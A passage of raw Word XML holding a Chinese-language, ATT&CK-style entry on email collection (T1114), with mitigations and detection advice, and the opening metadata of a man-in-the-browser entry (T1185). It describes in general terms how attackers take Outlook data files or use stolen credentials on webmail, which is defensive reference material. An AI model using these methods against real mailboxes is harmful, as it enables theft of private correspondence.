      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据并</w:t>
      </w:r>
      <w:r>
        <w:t>分步处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0E43B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>邮件收集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="71E2CEEA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35605924" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1114</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C488C46" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163A3D3D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="534BFE89" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>文件监控，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>进程使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2570C282" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2528D11C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F95226" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EADA71" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会锁定</w:t>
      </w:r>
      <w:r>
        <w:t>目标用户邮件来收集敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAEE87" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们可以从用户系统获取包含邮件数据的文件，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储或缓存文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.pst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.ost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D83D7" w14:textId="12F30A8B" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用用户的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并直接与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器进行交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来获取网络上</w:t>
      </w:r>
      <w:r>
        <w:t>的信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A279DEE" w14:textId="39705B29" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会获取用户</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并访问面向外部的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Webmail</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook Web Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE29099" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00CC2814" w14:paraId="2892EF07" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5AD20EF4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC2814" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2814">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47948A85" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC2814" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2814">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="1D536B90" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27E8A9CC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId232" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>敏感信息加密</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C6D12D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密的使用为通过电子邮件发送敏感信息增加了一层安全性。</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用公共密钥密</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>码术进行加密需要攻击者获取私有证书以及用于解密消息的加密密钥。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="47793031" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="910"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24524057" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId233" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因子认证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027B18F5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>面</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>向公众的</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ebmail</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器使用多因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>身份认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是推荐</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>的最佳实践，</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以最大程度地减少用户名和密码对于攻击者的用处。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F3AA2B2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57803771" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBCD67" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以采用多种方式从目标收集电子邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每种方式都有不同的检测机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4763E313" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>信息都可能表示有恶意活动发生：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问本地</w:t>
      </w:r>
      <w:r>
        <w:t>系统邮件文件并将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:t>渗漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；异常</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到网络内电子邮件服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面向公众的</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebmail</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常访问模式或身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B3714" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看是否有收集本地邮件</w:t>
      </w:r>
      <w:r>
        <w:t>文件的相关操作</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集信息，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CD8AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC4EC1">
        <w:t>MitB</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="5E66A9DC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72213997" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> T1185</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAB407A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D57471" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E0F117" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8DB143" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志，网络抓包，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D609C4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00703A01" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t>: Justin Warner, ICEBRG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46419E67" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00703A01">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00703A01">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="238F51F6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
